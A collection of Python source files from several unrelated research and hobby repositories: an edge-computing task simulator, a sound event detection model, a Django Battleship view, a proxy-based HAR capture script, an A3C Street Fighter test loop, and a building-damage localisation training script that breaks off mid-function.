self.buffering_time_edge.append(task.get_buffering_time(self.device_type["edge"]))
self.buffering_time_mobile.append(task.get_buffering_time(self.device_type["mobile"]))
buffering_time = task.get_buffering_time_sum()
self.buffering_time.append(buffering_time)
# network delay
self.network_delay_gsm.append(task.get_network_delay(0))
self.network_delay_wan.append(task.get_network_delay(1))
self.network_delay_man.append(task.get_network_delay(2))
self.network_delay_lan.append(task.get_network_delay(3))
network_delay = task.get_network_delay(0) + task.get_network_delay(1) + \
task.get_network_delay(2) + task.get_network_delay(3)
self.network_delay.append(network_delay)
# service time
service_time = processing_time + buffering_time + network_delay
self.service_time.append(service_time)
if task.get_task_deadline() > service_time:
self.completed_task += 1
if task.get_finish_node() == 0:
self.completed_task_mobile += 1
elif task.get_finish_node() == 1:
self.completed_task_edge += 1
elif task.get_finish_node() == 2:
self.completed_task_cloud += 1
```
#### File: ECOS/ecos/simulator.py
```python
import json
from enum import Enum
from ecos.event import Event
from ecos.task_generator import Task_generator
from ecos.log import Log
from ecos.topology import Topology
# 2022.01.07
class Simulator:
_instance = None
@classmethod
def get_instance(cls):
if not cls._instance:
cls._instance = Simulator()
return cls._instance
def __init__(self):
self.taskQueue = list()
self.terminate_time = 0
# type configuration
self.eventTag = self.my_enum('send', 'create', 'processing', "transmission", "progress", "stop")
self.node_type = self.my_enum("Mobile", "Edge", "Cloud")
self.network_type = self.my_enum("WLAN", "MAN", "WAN")
self.entity_state = Enum("FINISHED", "RUNNABLE")
# simulation set
self.running = False
self.clock = 0
self.warmUpPeriod = 0
self.intervalToGetLoadLog = 0
self.abruptTerminate = False
self.sim_scenario = None
self.orchestrator_policy = None
self.scenario_factory = None
self.entities = None
self.file_log_enable = True
# network setting
self.network_properties = None
# number of computing node setting
self.minNumOfMobileDevice = 0
self.maxNumOfMobileDevice = 0
self.mobileDeviceCounterSize = 0
self.numOfEdge = 0
self.num_device = 0
#minseon server id setting
#self.CloudId = None
#self.EdgeId = None
# task configuration
self.task_look_up_table = list()
self.task_generator = None
def initialize(self, configure, _network, _app, _num_of_edge, policy):
self.terminate_time = int(configure["simulation_time"]) * 60
self.orchestrator_policy = policy
self.minNumOfMobileDevice = int(configure["min_num_of_mobile_device"])
self.maxNumOfMobileDevice = int(configure["max_num_of_mobile_device"])
self.mobileDeviceCounterSize = int(configure["mobile_device_counter"])
self.sim_scenario = configure["simul_scenario"]
self.numOfEdge = _num_of_edge
self.network_properties = _network
# self.topology.link_configure(_network)
self.task_look_up_table = _app
return True
def set_simulation_factory(self, _scenario_factory):
self.scenario_factory = _scenario_factory
self.entities = [_scenario_factory.get_edge_manager(),
_scenario_factory.get_cloud_manager(),
_scenario_factory.get_device_manager()]
def get_scenario_factory(self):
return self.scenario_factory
def set_mobile_device(self, _num_device):
self.num_device = _num_device
self.task_generator = Task_generator(_num_device, self.task_look_up_table)
def get_warmup_period(self):
return self.warmUpPeriod
def get_task_look_up_table(self):
return self.task_look_up_table
def get_load_log_interval(self):
return self.intervalToGetLoadLog
def get_file_log_enable(self):
return self.file_log_enable
def get_network_properties(self):
return self.network_properties
def get_min_num_of_mobile_device(self):
return self.minNumOfMobileDevice
def get_max_num_of_mobile_device(self):
return self.maxNumOfMobileDevice
def get_num_of_mobile_device(self):
return self.num_device
def get_num_of_edge(self):
return self.numOfEdge
def get_orchestration_policy(self):
return self.orchestrator_policy
def get_simulation_scenario(self):
return self.sim_scenario
def get_clock(self):
return self.clock
def start_simulator(self):
#
print("start simulation")
self.run()
def run(self):
if self.running is False:
self.running = True
# check entities
for item in self.entities:
item.start_entity()
self.clock = 0
self.task_generator.create_task(self.terminate_time)
print("Task creation is completed: ", len(self.task_generator.get_task()))
# schedule the task
for task in self.task_generator.get_task():
event = Event({"task": "create"}, task, task.get_birth_time())
self.send_event(event)
# schedule main object
# progress
event = Event({"simulation": "progress"}, None, self.terminate_time/100)
self.send_event(event)
# stop
event = Event({"simulation": "stop"}, None, self.terminate_time)
self.send_event(event)
while True:
if self.run_clock_tick() and self.abruptTerminate:
break
if self.clock >= self.terminate_time > 0.0:
self.run_stop()
self.clock = self.terminate_time
break
clock = self.clock
self.finish_simulation()
self.run_stop()
return clock
def run_stop(self):
for entity in self.entities:
entity.shutdown_entity()
self.running = False
def finish_simulation(self):
#
if self.abruptTerminate is True:
for ent in self.entities:
if ent.get_state() != self.entity_state.FINISHED:
ent.run()
for ent in self.entities:
ent.shutdown_entity()
Log.get_instance().sim_stop()
def run_clock_tick(self):
#
queue_empty = False
for item in self.entities:
if item.get_state() == self.entity_state.RUNNABLE:
item.run()
if len(self.taskQueue) > 0:
event_list = list()
event = None
# integer max value
time = 9223372036854775807
for i in self.taskQueue:
i.get_time()
if i.get_time() < time:
time = i.get_time()
event = i
event_list.append(event)
for i in self.taskQueue:
if event == i:
continue
if time == i.get_time():
event_list.append(i)
# remove event in task queue
for item in event_list:
self.taskQueue.remove(item)
for item in self.taskQueue:
event_time = item.get_time()
update_time = event_time - event.get_time()
if update_time < 0:
update_time = 0
item.update_time(update_time)
# print(event.get_time())
self.clock += event.get_time()
self.process_event(event_list)
else:
queue_empty = True
self.running = False
print("Simulation: No more events")
return queue_empty
def process_event(self, event):
for evt in event:
msg = evt.get_message()
# print(msg, ":", evt.get_time())
# event described by json
# call the event depend on the function
if msg.get("task"):
#
if msg.get("task") == "create":
# task create
self.scenario_factory.get_device_manager().get_offload_target(evt.get_task())
elif msg.get("task") == "send":
# send the task
task = evt.get_task()
self.scenario_factory.network_model.enqueue(task)
elif msg.get("task") == "processing":
# task processing in node
# check each node
if msg["detail"]["source"] == -1:
self.scenario_factory.get_edge_manager().receive_task_from_device(evt)
elif msg["detail"]["source"] == 0:
self.scenario_factory.get_cloud_manager().receive_task(evt)
else:
self.scenario_factory.get_edge_manager().receive_task_from_edge(evt)
elif msg.get("task") == "check":
if msg["detail"]["node"] == "device":
device = self.entities[2].get_node_list()[msg["detail"]["id"]]
device.update_task_state(self.clock)
elif msg["detail"]["node"] == "edge":
edge = self.entities[0].get_node_list()[msg["detail"]["id"] - 1]
edge.update_task_state(self.clock)
elif msg["detail"]["node"] == "cloud":
cloud = self.entities[1].get_node_list()[msg["detail"]["id"]]
cloud.update_task_state(self.clock)
elif msg.get("network"):
#
if msg.get("network") == "transmission":
# send task to cloud (finish)
if msg["detail"]["type"] == 0:
link = msg["detail"]["link"]
link.update_send_task(evt.get_task())
msgg = {
"task": "processing",
"detail": {
"source": 0
}
}
evt.get_task().set_network_delay(self.get_clock(), 1)
evtt = Event(msgg, evt.get_task(), 0)
self.send_event(evtt)
else:
# send task to edge
# link
link = msg["detail"]["link"]
link.update_send_task(evt.get_task())
# update msg
route_list = msg["detail"]["route"]
route_list.remove(int(msg["detail"]["source"]))
delay = 0
if len(route_list) <= 1:
typ = msg["detail"]["type"]
msgg = {
"task": "processing",
"detail" : {
"source": typ,
"route": route_list
}
}
evt.get_task().set_network_delay(self.get_clock(), 2)
et = Event(msgg, evt.get_task(), delay)
self.send_event(et)
else:
source_edge = route_list[0]
dest = route_list[1]
updated_link = link
# find link
for lnk in self.scenario_factory.get_edge_manager().get_link_list():
lnk_status = lnk.get_link()
if source_edge == lnk_status[0] and dest == lnk_status[1]:
updated_link = lnk
delay = lnk.get_download_delay(evt.get_task())
msg["detail"]["delay"] = delay
msg["detail"]["link"] = updated_link
et = Event(msg, evt.get_task(), delay)
self.send_event(et)
elif msg.get("simulation"):
if msg.get("simulation") == "progress":
#
progress = int((self.clock * 100)/self.terminate_time)
if progress % 10 == 0:
print(progress, end='')
else:
print(".", end='')
if self.clock <= self.terminate_time:
evt.update_time(self.terminate_time/100)
self.send_event(evt)
elif msg.get("simulation") == "stop":
#
self.finish_simulation()
def send_event(self, event):
#
self.taskQueue.append(event)
def my_enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
return type('Enum', (), enums)
def parse_json_file(self, file):
json_file = json.dumps(file, indent=4)
return json_file
``` |
{
"source": "JinhuaLiang/CS4347_SED_GroupProjec",
"score": 2
} |
#### File: CS4347_SED_GroupProjec/pytorch/models.py
```python
import os
import sys
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torchlibrosa.stft import Spectrogram, LogmelFilterBank
from torchlibrosa.augmentation import SpecAugmentation
from pytorch_utils import do_mixup
def init_layer(layer):
"""Initialize a Linear or Convolutional layer. """
nn.init.xavier_uniform_(layer.weight)
if hasattr(layer, 'bias'):
if layer.bias is not None:
layer.bias.data.fill_(0.)
def init_bn(bn):
"""Initialize a Batchnorm layer. """
bn.bias.data.fill_(0.)
bn.weight.data.fill_(1.)
def init_gru(rnn):
"""Initialize a GRU layer. """
def _concat_init(tensor, init_funcs):
(length, fan_out) = tensor.shape
fan_in = length // len(init_funcs)
for (i, init_func) in enumerate(init_funcs):
init_func(tensor[i * fan_in : (i + 1) * fan_in, :])
def _inner_uniform(tensor):
fan_in = nn.init._calculate_correct_fan(tensor, 'fan_in')
nn.init.uniform_(tensor, -math.sqrt(3 / fan_in), math.sqrt(3 / fan_in))
for i in range(rnn.num_layers):
_concat_init(
getattr(rnn, 'weight_ih_l{}'.format(i)),
[_inner_uniform, _inner_uniform, _inner_uniform]
)
torch.nn.init.constant_(getattr(rnn, 'bias_ih_l{}'.format(i)), 0)
_concat_init(
getattr(rnn, 'weight_hh_l{}'.format(i)),
[_inner_uniform, _inner_uniform, nn.init.orthogonal_]
)
torch.nn.init.constant_(getattr(rnn, 'bias_hh_l{}'.format(i)), 0)
class Block(nn.Module):
def __init__(self, in_channels, out_channels):
super(Block, self).__init__()
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=(3, 3), stride=(1, 1),
padding=(1, 1), bias=False)
self.bn = nn.BatchNorm2d(out_channels)
self.init_weight()
def init_weight(self):
init_layer(self.conv)
init_bn(self.bn)
def forward(self, input):
x = input
x = self.bn(self.conv(x))
x = F.glu(x, dim=1) # (batch_size, channels, time_steps, mel_bins)
return x
class AttBlock(nn.Module):
def __init__(self, n_in, n_out, activation='linear', temperature=1.):
super(AttBlock, self).__init__()
self.activation = activation
self.temperature = temperature
self.att = nn.Conv1d(in_channels=n_in, out_channels=n_out, kernel_size=1, stride=1, padding=0, bias=True)
self.cla = nn.Conv1d(in_channels=n_in, out_channels=n_out, kernel_size=1, stride=1, padding=0, bias=True)
self.bn_att = nn.BatchNorm1d(n_out)
self.init_weights()
def init_weights(self):
init_layer(self.att)
init_layer(self.cla)
init_bn(self.bn_att)
def forward(self, x):
# x: (n_samples, n_in, n_time)
tmp = self.att(x)
tmp = torch.clamp(tmp, -10, 10)
att = torch.exp(tmp / self.temperature) + 1e-6
norm_att = att / torch.sum(att, dim=2)[:, :, None]
cla = self.nonlinear_transform(self.cla(x))
x = torch.sum(norm_att * cla, dim=2)
return x, norm_att, cla
def nonlinear_transform(self, x):
if self.activation == 'linear':
return x
elif self.activation == 'sigmoid':
return torch.sigmoid(x)
# The following CRNN architecture are designed following Yong Xu's code:
# https://github.com/yongxuUSTC/dcase2017_task4_cvssp
class Cnn_Gru(nn.Module):
def __init__(self, sample_rate, window_size, hop_size, mel_bins, fmin,
fmax, classes_num):
super(Cnn_Gru, self).__init__()
window = 'hann'
center = False
pad_mode = 'reflect'
ref = 1.0
amin = 1e-10
top_db = None
# Spectrogram extractor
self.spectrogram_extractor = Spectrogram(n_fft=window_size, hop_length=hop_size,
win_length=window_size, window=window, center=center, pad_mode=pad_mode,
freeze_parameters=True)
# Logmel feature extractor
self.logmel_extractor = LogmelFilterBank(sr=sample_rate, n_fft=window_size,
n_mels=mel_bins, fmin=fmin, fmax=fmax, ref=ref, amin=amin, top_db=top_db,
freeze_parameters=True)
# Spec augmenter
self.spec_augmenter = SpecAugmentation(time_drop_width=16, time_stripes_num=2,
freq_drop_width=8, freq_stripes_num=2)
self.bn0 = nn.BatchNorm2d(mel_bins)
self.block1 = Block(in_channels=1, out_channels=128)
self.block2 = Block(in_channels=64, out_channels=128)
self.block3 = Block(in_channels=64, out_channels=128)
self.block4 = Block(in_channels=64, out_channels=128)
self.block5 = Block(in_channels=64, out_channels=128)
self.block6 = Block(in_channels=64, out_channels=128)
self.block7 = Block(in_channels=64, out_channels=128)
self.block8 = Block(in_channels=64, out_channels=128)
self.conv9 = nn.Conv2d(in_channels=64,
out_channels=256,
kernel_size=(3, 3), stride=(1, 1),
padding=(1, 1), bias=True)
self.bigru = nn.GRU(input_size=256, hidden_size=128, num_layers=1,
bias=True, batch_first=True, bidirectional=True)
self.bigru_g = nn.GRU(input_size=256, hidden_size=128, num_layers=1,
bias=True, batch_first=True, bidirectional=True)
self.att_block = AttBlock(n_in=256, n_out=classes_num, activation='sigmoid')
self.init_weights()
def init_weights(self):
init_bn(self.bn0)
init_layer(self.conv9)
init_gru(self.bigru)
init_gru(self.bigru_g)
def forward(self, input, mixup_lambda=None):
x = self.spectrogram_extractor(input) # (batch_size, 1, time_steps, freq_bins)
x = self.logmel_extractor(x) # (batch_size, 1, time_steps, mel_bins)
x = x.transpose(1, 3)
x = self.bn0(x)
x = x.transpose(1, 3)
if self.training:
x = self.spec_augmenter(x)
# Mixup on spectrogram
if self.training and mixup_lambda is not None:
x = do_mixup(x, mixup_lambda)
x = self.block1(x)
x = self.block2(x)
x = F.max_pool2d(x, kernel_size=(1, 2))
x = self.block3(x)
x = self.block4(x)
x = F.max_pool2d(x, kernel_size=(1, 2))
x = self.block5(x)
x = self.block6(x)
x = F.max_pool2d(x, kernel_size=(1, 2))
x = self.block7(x)
x = self.block8(x)
x = F.max_pool2d(x, kernel_size=(1, 2))
x = F.relu_(self.conv9(x))
(x, _) = torch.max(x, dim=3)
x = x.transpose(1, 2) # (batch_size, time_steps, channels)
(rnnout, _) = self.bigru(x)
(rnnout_gate, _) = self.bigru_g(x)
x = rnnout.transpose(1, 2) * rnnout_gate.transpose(1, 2)
"""x.shape = (batch_size, channels, time_steps)"""
(clipwise_output, norm_att, cla) = self.att_block(x)
"""cla.shape = (batch_size, classes_num, time_steps)"""
output_dict = {
'framewise_output': cla.transpose(1, 2),
'clipwise_output': clipwise_output,
'embedding': cla}
return output_dict
```
#### File: CS4347_SED_GroupProjec/utils/vad.py
```python
import numpy as np
def activity_detection(x, thres, low_thres=None, n_smooth=1, n_salt=0):
"""Activity detection.
Args:
x: array
thres: float, threshold
low_thres:float, second lower threshold
n_smooth: integar, number of frames to smooth.
n_salt: integar, number of frames equal or shorter this value will be
removed. Set this value to 0 means do not use delete_salt_noise.
Return: list of [bgn, fin]
"""
locts = np.where(x > thres)[0]
# Find pairs of [bgn, fin]
bgn_fin_pairs = find_bgn_fin_pairs(locts)
# Second threshold
if low_thres is not None:
bgn_fin_pairs = activity_detection_with_second_thres(
x, bgn_fin_pairs, low_thres)
# Smooth
bgn_fin_pairs = smooth(bgn_fin_pairs, n_smooth)
# Remove salt noise
bgn_fin_pairs = remove_salt_noise(bgn_fin_pairs, n_salt)
return bgn_fin_pairs
def find_bgn_fin_pairs(locts):
"""Find pairs of [bgn, fin] from loctation array
"""
if len(locts)==0:
return []
else:
bgns = [locts[0]]
fins = []
for i1 in range(1, len(locts) - 1): # range from locts[1] to locts[-2]
if locts[i1] - locts[i1 - 1] > 1:
fins.append(locts[i1 - 1] + 1)
bgns.append(locts[i1] + 1)
fins.append(locts[-1])
assert len(bgns)==len(fins)
lists = []
for i1 in range(len(bgns)):
lists.append([bgns[i1], fins[i1]])
return lists
def activity_detection_with_second_thres(x, bgn_fin_pairs, thres):
"""Double threshold method.
"""
new_bgn_fin_pairs = []
for [bgn, fin] in bgn_fin_pairs:
while(bgn != -1):
if x[bgn] < thres:
break
bgn -= 1
while(fin != len(x)):
if x[fin] < thres:
break
fin += 1
new_bgn_fin_pairs.append([bgn + 1, fin])
new_bgn_fin_pairs = smooth(new_bgn_fin_pairs, n_smooth=1)
return new_bgn_fin_pairs
def smooth(bgn_fin_pairs, n_smooth):
"""Smooth the [bgn, fin] pairs.
"""
new_bgn_fin_pairs = []
if len(bgn_fin_pairs) == 0:
return []
[mem_bgn, fin] = bgn_fin_pairs[0]
for n in range(1, len(bgn_fin_pairs)):
[pre_bgn, pre_fin] = bgn_fin_pairs[n - 1]
[bgn, fin] = bgn_fin_pairs[n]
if bgn - pre_fin <= n_smooth:
pass
else:
new_bgn_fin_pairs.append([mem_bgn, pre_fin])
mem_bgn = bgn
new_bgn_fin_pairs.append([mem_bgn, fin])
return new_bgn_fin_pairs
def remove_salt_noise(bgn_fin_pairs, n_salt):
"""Remove salt noise
"""
new_bgn_fin_pairs = []
for [bgn, fin] in bgn_fin_pairs:
if fin - bgn <= n_salt:
pass
else:
new_bgn_fin_pairs.append([bgn, fin])
return new_bgn_fin_pairs
``` |
{
"source": "JinhuaSu/Battleship",
"score": 2
} |
#### File: Battleship/Battleship/views.py
```python
from django.http import HttpResponse
from django.shortcuts import render
def hello(request):
return HttpResponse("Hello world ! ")
def Battleship(request):
context = {}
context['hello'] = 'Hello World!'
context['rows'] = [str(i) for i in range(7)]
context['columns'] = [str(i) for i in range(7)]
return render(request, 'Battleship.html',context)
``` |
{
"source": "JinhuaSu/RMusicDown",
"score": 3
} |
#### File: RMusicDown/py/har_test.py
```python
from browsermobproxy import Server
from selenium.webdriver.firefox.options import Options
from selenium import webdriver
import time
import pprint
class ProxyManger:
__BMP = "../../browsermob-proxy-2.1.4/bin/browsermob-proxy"
def __init__(self):
self.__server = Server(ProxyManger.__BMP)
self.__client = None
def start_server(self):
self.__server.start()
return self.__server
def start_client(self):
self.__client = self.__server.create_proxy()
# params={"trustAllServers": "true"}
return self.__client
@property
def client(self):
return self.__client
@property
def server(self):
return self.__server
if __name__ == "__main__":
# 开启Proxy
proxy = ProxyManger()
server = proxy.start_server()
time.sleep(1)
client = proxy.start_client()
# 配置Proxy启动WebDriver
options = webdriver.ChromeOptions()
# options = Options()
options.add_argument("--proxy-server={}".format(client.proxy))
options.add_argument("--ignore-certificate-errors")
# options.headless = True
# driver = webdriver.Firefox(options=options)
chromePath = "/home/su/app/crawler/stock_post_crawler/chromedriver"
driver = webdriver.Chrome(executable_path=chromePath, chrome_options=options)
# 获取返回的内容
client.new_har("baidu.com")
driver.get("https://www.baidu.com/")
time.sleep(3)
newHar = client.har
pprint.pprint(newHar)
server.stop()
``` |
{
"source": "JinhuaSu/sfiiia-a3c",
"score": 2
} |
#### File: sfiiia-a3c/src/test.py
```python
import time
from collections import deque
import torch
import torch.nn.functional as F
from env.envs import create_atari_env
from models.model import ActorCritic
from env.Environment import Environment
#I must get totally known about the whole structure of the model. And I should have a taste or VITA tea to control my baozou feelings
import scipy.misc
def test(rank, args, shared_model,model, counter):
torch.manual_seed(args.seed + rank)
save_img = True if args.img_path != "" else False
device = args.use_gpu[rank%len(args.use_gpu)] if len(args.use_gpu) > 0 else -1
device = 0
if args.play_sf:
roms_path = args.roms # Replace this with the path to your ROMs
if args.mode == 'PvP':
print('PvP throttle:%s'%args.throttle)
env = Environment("env"+str(rank), roms_path,difficulty=args.difficulty,frame_ratio =3,frames_per_step = 1,throttle =args.throttle)
else:
env = Environment("env"+str(rank), roms_path,difficulty=args.difficulty,frame_ratio =3,frames_per_step = 1,throttle =False)
env.start()
state, reward, round_done, stage_done, done = env.step(8, 9)
state = state.T
else:
env = create_atari_env(args.env_name)
env.seed(args.seed + rank)
model = ActorCritic(env.observation_space.shape[0], env.action_space.n)
state = env.reset()
model.eval()
state = torch.from_numpy(state)
if device >=0:
state = state.to(device)
reward_sum = 0
done = True
start_time = time.time()
# a quick hack to prevent the agent from stucking
actions = deque(maxlen=100)
episode_length = 0
step = 0
while True:
# Sync with the shared model
if done:
num_stage = 0
print('test start!')
model.load_state_dict(shared_model.state_dict())
cx = torch.zeros(1, 1024)
hx = torch.zeros(1, 1024)
if device >=0:
cx = cx.to(device)
hx = hx.to(device)
else:
cx = cx.detach()
hx = hx.detach()
episode_length += 1
with torch.no_grad():
value, logit, (hx, cx) = model((state.float().unsqueeze(0), (hx, cx)))
prob = F.softmax(logit, dim=-1)
action = prob.multinomial(num_samples=1).detach()
#action = prob.max(1, keepdim=True)[1].cpu().numpy()
if args.play_sf:
action_id = action.cpu().numpy()[0,0]
if action_id < 90:
move_action, attack_action = action_id//10,action_id%10
else:
move_action, attack_action = -1,action_id%90
state, reward, round_done, stage_done, done = env.step(move_action, attack_action)
reward = reward[args.reward_mode]
if save_img and step == 0:
scipy.misc.toimage(state).save(args.img_path+'action(%s)_%s.png'%(action_id,episode_length))#保存图像
state = state.T
if done:
env.new_game()
if stage_done:
num_stage += 1
env.next_stage()
if round_done:
env.next_round()
else:
state, reward, done, _ = env.step(action[0, 0])
reward_sum += reward
# a quick hack to prevent the agent from stucking
actions.append(action[0, 0])
#if args.mode == 'train' and actions.count(actions[0]) == actions.maxlen:
# done = True
if done:
print("Time {}, num steps {}, FPS {:.0f}, episode reward {}, episode length {}, win_stage_num {}".format(
time.strftime("%Hh %Mm %Ss",
time.gmtime(time.time() - start_time)),
counter.value, counter.value / (time.time() - start_time),
reward_sum, episode_length,num_stage))
step += 1
if args.mode == 'train' and step % args.save_per_min == 0:
print('saving model params at step %s' % step)
torch.save(shared_model.state_dict(),'%s/model_params_step_%s.pkl' %(args.model_path+args.reward_mode,step))
reward_sum = 0
episode_length = 0
actions.clear()
if args.play_sf:
env.new_game()
state, reward, _, _, _ = env.step(8, 9)
state = state.T
reward = reward[args.reward_mode]
else:
state = env.reset()
if args.mode == 'train':
print('test mode sleep for 60 seconds')
time.sleep(60)
state = torch.from_numpy(state)
if device >=0:
state = state.to(device)
reward = torch.tensor(reward)
reward = reward.to(device)
``` |
{
"source": "JinhuaSu/xview2_1st_place_solution",
"score": 2
} |
#### File: xview2_1st_place_solution/train_src/train_student_building.py
```python
import os
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
os.environ["OMP_NUM_THREADS"] = "1"
from os import path, makedirs, listdir
import sys
import numpy as np
np.random.seed(1)
import random
random.seed(1)
import torch
from torch import nn
from torch.backends import cudnn
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
import torch.optim.lr_scheduler as lr_scheduler
import time
eps = 1e-6
from apex import amp
from util.adamw import AdamW
from util.losses import dice_round, ComboLoss
import pandas as pd
from tqdm import tqdm
import timeit
import cv2
from zoo.models import (
SeResNext50_Unet_Loc,
SeResNext50_Unet_Loc_KD,
SeResNext50_Unet_Double,
)
from imgaug import augmenters as iaa
from util.utils import *
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
import gc
from util.emailbox import EmailBot
from apex import amp
import argparse
from util.mongo_logger import Logger
DB = "building_damage_kd"
COLLECTION = "v3_loc"
logger = Logger(DB, COLLECTION)
parser = argparse.ArgumentParser()
parser.add_argument(
"--mode", default="T-S", choices=["onlyT", "onlyS", "T-S", "TwoTeacher"]
)
parser.add_argument("--LWF", default=0, choices=[0, 1], type=int)
parser.add_argument("--LFL", default=0, choices=[0, 1], type=int)
parser.add_argument("--clsLFL", default=0, choices=[0, 1], type=int)
parser.add_argument("--KL", default=0, choices=[0, 1], type=int)
parser.add_argument("--dataset", default="../data")
parser.add_argument("--checkpoint_path", default="../weights")
parser.add_argument("--seed", default=1, type=int)
parser.add_argument("--vis_dev", default=0, type=int)
parser.add_argument("--batch_size", default=8, type=int)
parser.add_argument("--val_batch_size", default=4, type=int)
parser.add_argument("--lr", default=0.002, type=float)
parser.add_argument("--weight_decay", default=1e-6, type=float)
parser.add_argument("--theta", default=1.0, type=float)
parser.add_argument("--alpha", default=1.0, type=float)
parser.add_argument("--alpha_cls", default=1.0, type=float)
parser.add_argument("--beta", default=1.0, type=float)
parser.add_argument("--m", default=0.2, type=float)
args = parser.parse_args()
logger.add_attr("LWF", args.LWF, "info")
logger.add_attr("LFL", args.LFL, "info")
logger.add_attr("clsLFL", args.clsLFL, "info")
logger.add_attr("KL", args.KL, "info")
logger.add_attr("mode", args.mode, "info")
logger.add_attr("lr", args.lr, "info")
logger.add_attr("theta", args.theta, "info")
logger.add_attr("alpha", args.alpha, "info")
logger.add_attr("alpha_cls", args.alpha_cls, "info")
logger.add_attr("beta", args.beta, "info")
logger.add_attr("m", args.m, "info")
logger.add_attr("weight_decay", args.weight_decay, "info")
logger.insert_into_db("info")
emailbot = EmailBot("../settings.json")
emailbot.sendOne(
{
"title": "显卡%s训练任务开始训练loc" % args.vis_dev,
"content": "mode=%s,LWF=%s,KL=%s,LFL=%s,clsLFL=%s"
% (args.mode, args.LWF, args.KL, args.LFL, args.clsLFL),
}
)
cv2.setNumThreads(0)
cv2.ocl.setUseOpenCL(False)
train_dirs = ["train", "tier3"]
models_folder = args.checkpoint_path
input_shape = (512, 512)
all_files = []
for d in train_dirs:
for f in sorted(listdir(path.join(args.dataset + d, "images"))):
if "_pre_disaster.png" in f:
all_files.append(path.join(args.dataset + d, "images", f))
class TrainData(Dataset):
def __init__(self, train_idxs):
super().__init__()
self.train_idxs = train_idxs
self.elastic = iaa.ElasticTransformation(alpha=(0.25, 1.2), sigma=0.2)
def __len__(self):
return len(self.train_idxs)
def __getitem__(self, idx):
_idx = self.train_idxs[idx]
fn = all_files[_idx]
img = cv2.imread(fn, cv2.IMREAD_COLOR)
if random.random() > 0.985:
img = cv2.imread(
fn.replace("_pre_disaster", "_post_disaster"), cv2.IMREAD_COLOR
)
msk0 = cv2.imread(fn.replace("/images/", "/masks/"), cv2.IMREAD_UNCHANGED)
if random.random() > 0.5:
img = img[::-1, ...]
msk0 = msk0[::-1, ...]
if random.random() > 0.05:
rot = random.randrange(4)
if rot > 0:
img = np.rot90(img, k=rot)
msk0 = np.rot90(msk0, k=rot)
if random.random() > 0.9:
shift_pnt = (random.randint(-320, 320), random.randint(-320, 320))
img = shift_image(img, shift_pnt)
msk0 = shift_image(msk0, shift_pnt)
if random.random() > 0.9:
rot_pnt = (
img.shape[0] // 2 + random.randint(-320, 320),
img.shape[1] // 2 + random.randint(-320, 320),
)
scale = 0.9 + random.random() * 0.2
angle = random.randint(0, 20) - 10
if (angle != 0) or (scale != 1):
img = rotate_image(img, angle, scale, rot_pnt)
msk0 = rotate_image(msk0, angle, scale, rot_pnt)
crop_size = input_shape[0]
if random.random() > 0.3:
crop_size = random.randint(
int(input_shape[0] / 1.1), int(input_shape[0] / 0.9)
)
bst_x0 = random.randint(0, img.shape[1] - crop_size)
bst_y0 = random.randint(0, img.shape[0] - crop_size)
bst_sc = -1
try_cnt = random.randint(1, 5)
for i in range(try_cnt):
x0 = random.randint(0, img.shape[1] - crop_size)
y0 = random.randint(0, img.shape[0] - crop_size)
_sc = msk0[y0 : y0 + crop_size, x0 : x0 + crop_size].sum()
if _sc > bst_sc:
bst_sc = _sc
bst_x0 = x0
bst_y0 = y0
x0 = bst_x0
y0 = bst_y0
img = img[y0 : y0 + crop_size, x0 : x0 + crop_size, :]
msk0 = msk0[y0 : y0 + crop_size, x0 : x0 + crop_size]
if crop_size != input_shape[0]:
img = cv2.resize(img, input_shape, interpolation=cv2.INTER_LINEAR)
msk0 = cv2.resize(msk0, input_shape, interpolation=cv2.INTER_LINEAR)
if random.random() > 0.99:
img = shift_channels(
img, random.randint(-5, 5), random.randint(-5, 5), random.randint(-5, 5)
)
if random.random() > 0.99:
img = change_hsv(
img, random.randint(-5, 5), random.randint(-5, 5), random.randint(-5, 5)
)
if random.random() > 0.99:
if random.random() > 0.99:
img = clahe(img)
elif random.random() > 0.99:
img = gauss_noise(img)
elif random.random() > 0.99:
img = cv2.blur(img, (3, 3))
elif random.random() > 0.99:
if random.random() > 0.99:
img = saturation(img, 0.9 + random.random() * 0.2)
elif random.random() > 0.99:
img = brightness(img, 0.9 + random.random() * 0.2)
elif random.random() > 0.99:
img = contrast(img, 0.9 + random.random() * 0.2)
if random.random() > 0.999:
el_det = self.elastic.to_deterministic()
img = el_det.augment_image(img)
msk = msk0[..., np.newaxis]
msk = (msk > 127) * 1
img = preprocess_inputs(img)
img = torch.from_numpy(img.transpose((2, 0, 1))).float()
msk = torch.from_numpy(msk.transpose((2, 0, 1))).long()
sample = {"img": img, "msk": msk, "fn": fn}
return sample
class ValData(Dataset):
def __init__(self, image_idxs):
super().__init__()
self.image_idxs = image_idxs
def __len__(self):
return len(self.image_idxs)
def __getitem__(self, idx):
_idx = self.image_idxs[idx]
fn = all_files[_idx]
img = cv2.imread(fn, cv2.IMREAD_COLOR)
msk0 = cv2.imread(fn.replace("/images/", "/masks/"), cv2.IMREAD_UNCHANGED)
msk = msk0[..., np.newaxis]
msk = (msk > 127) * 1
img = preprocess_inputs(img)
img = torch.from_numpy(img.transpose((2, 0, 1))).float()
msk = torch.from_numpy(msk.transpose((2, 0, 1))).long()
sample = {"img": img, "msk": msk, "fn": fn}
return sample
def validate(model, data_loader):
global logger
dices0 = []
_thr = 0.5
with torch.no_grad():
for i, sample in enumerate(tqdm(data_loader)):
msks = sample["msk"].numpy()
imgs = sample["img"].cuda(non_blocking=True)
t1 = time.time()
out = model(imgs)
t2 = time.time()
logger.add_attr("batch_%s" % i, t2 - t1, "time_difference")
msk_pred = torch.sigmoid(out[:, 0, ...]).cpu().numpy()
for j in range(msks.shape[0]):
dices0.append(dice(msks[j, 0], msk_pred[j] > _thr))
logger.insert_into_db("time_difference")
d0 = np.mean(dices0)
logger.add_attr("d0", d0)
print("Val Dice: {}".format(d0))
return d0
def evaluate_val_kd(args, data_val, best_score, model, snapshot_name, current_epoch):
global logger
model.eval()
d = validate(model, data_loader=data_val)
logger.add_attr("epoch", epoch)
if d > best_score:
torch.save(
{
"epoch": current_epoch + 1,
"state_dict": model.state_dict(),
"best_score": d,
},
